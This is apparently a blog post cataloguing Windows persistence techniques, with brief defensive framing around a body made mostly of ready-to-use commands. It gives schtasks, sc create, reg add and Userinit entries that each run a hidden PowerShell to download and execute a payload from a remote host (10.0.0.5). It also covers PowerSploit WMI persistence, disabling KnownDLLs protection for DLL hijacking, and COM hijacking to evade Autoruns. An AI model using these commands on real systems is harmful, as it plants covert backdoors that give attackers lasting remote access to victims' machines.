Common ways to maintaining privilege/access in Windows, Backdoor, Fileless backdoor

Last Updated on

In order to be able to protect the system from intrusion, we need to understand how the privilege maintaining works.

Windows Task Scheduler

Use Windows Task Scheduler to launch recurring tasks such as script, software etc.

schtasks /create /sc minute /mo 1 /tn "Update Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.0.0.5:8080/fun.png\"\"\"))\""

Note: When execute in command prompt, single quote will be replace to double quot, here we use three double quotes.

This script will launch every 1 minute

Windows Task Scheduler
Windows Task Scheduler

Autostart Service

sc create "Backdoor" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""
sc description Backdoor "Backdoor Test"        //Description for the service
sc config Backdoor start= auto                //Make it auto-start
net start Backdoor                            //Start the service
Windows Services
Windows Services

WMI

We can utilize “powersploit” module from “powersploit”

Import-Module .\Persistence\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '1 PM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

Registry

Add backdoor path to auto-run key, to start the backdoor on system boot

Common auto-start keys

# Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Winlogon\Userinit Key
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

(There are many other similar keys related to auto-start)

Use following command to create fileless backdoor

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "KeyNameBackdoor" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\"" /f

Logon Scripts Backdoor

Registry path:

HKEY_CURRENT_USER\Environment\

Create string key:

UserInitMprLogonScript

Set Value to absolute path:

C:\backdoor.bat

userinit Fileless Backdoor

When login, winlogon will run specified program. It can be used to Add/Remove program.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
 "Userinit"="C:\Windows\system32\userinit.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/fun.png'))\""

Group Policy logon script

Run -> gpedit.msc -> User Configuration -> Scripts (Logon/Logoff)

Windows Local Group Policy Editor
Windows Local Group Policy Editor

Note: Must use full path e.g. “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”

DLL Hijacking

If an process is trying to load a dll without absolute path, Windows will try to look for the dll from specified folder. If one of the folders can by modified by the attacker, the malicious dll will be loaded, then the malicious code will be executed.

Common attack like LPK.dll

Windows 7 and up have added KnownDLLs protection, add LPK.dll to following registry key to enable the dll hijacking

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\

Create String type of Key name it

ExcludeFromKnownDlls

Set the value to

LPK.dll

COM hijacking

The key is to create correct dll and choose right CLSID, by changing CLSID key value from registry, CAccPropServicesClass hacking and MMDeviceEnumerator hijacking can be carried out.
Many system processes will invoke them when starting. It can bypass auto-start checks from Autoruns.

Remote Control, Remote Access Trojan (RAT)

RAT is a type of malicious program it includs backdoors on victims’ devices. Usually propagate by normal client requests, e.g. email attachments, game program. etc. Attacker use them on clients’ device to spread RAT, eventually build botnet.

To keep the system safe and away from backdoors, we have to have knowledge in troubleshooting intrusion, keep the system up to date, check server security regularly.

Leave a Reply

Your email address will not be published. Required fields are marked *